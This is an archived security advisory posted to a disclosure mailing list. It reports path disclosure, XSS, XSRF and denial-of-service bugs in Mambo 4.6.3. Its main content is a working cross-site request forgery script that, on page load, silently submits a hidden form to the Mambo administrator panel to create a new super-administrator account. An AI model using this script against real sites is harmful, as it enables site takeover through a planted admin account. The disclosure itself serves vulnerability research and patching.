Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | Mambo 4.6.3 Path Disclosure, XSS , XSRF, DOS |
|---|---|
| Date: | Mon, 28 Jan 2008 17:17:22 +0330 |
########################## WwW.BugReport.ir ######################### # # AmnPardaz Security Research Team # # Title: Mambo Vulnerabilities # Vendor: http://mamboserver.com # Bugs: Path Disclosure, XSS , XSRF, DOS # Vulnerable Version:4.6.3 (prior versions also may be affected) # Exploitation: Remote with browser # Fix Available: No! ################################################################
#################### - Description: ####################
#################### - Vulnerability: ####################
content of http://somewhere/test.js
window.onload = function() {
var url = 'http://localhost/MamboV4.6.2/administrator/index2.php';
var gid = 25;
var user = 'amnpardaz';
var pass = 'amnpardaz';
var email = 'amnpardaz@none.com';
var param = {name: user, username: user, email: email, password: pass, password2: pass, gid: gid, block: 0, option: 'com_users', task: 'save', sendEmail: 0
};
var form = document.createElement('form');
form.action = url;
form.method = 'post';
form.target = 'hidden';
form.style.display = 'none';for (var i in param)
{
try
{ // ie
var input = document.createElement('<input name="'+i+'">');
}
catch(e)
{ // other browsers
var input = document.createElement('input');
input.name = i;
}
input.setAttribute('value', param[i]);
form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
location.replace(url);
}
Code Snippet:
#################### - Credit : #################### AmnPardaz Security Research Team Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | [Full-disclosure] [ GLSA 200801-14 ] Blam: User-assisted execution of arbitrary code, Robert Buchholz |
|---|---|
| Next by Date: | Metasploit Framework v3.1 Released, H D Moore |
| Previous by Thread: | [Full-disclosure] [ GLSA 200801-14 ] Blam: User-assisted execution of arbitrary code, Robert Buchholz |
| Next by Thread: | Metasploit Framework v3.1 Released, H D Moore |
| Indexes: | [Date] [Thread] [Top] [All Lists] |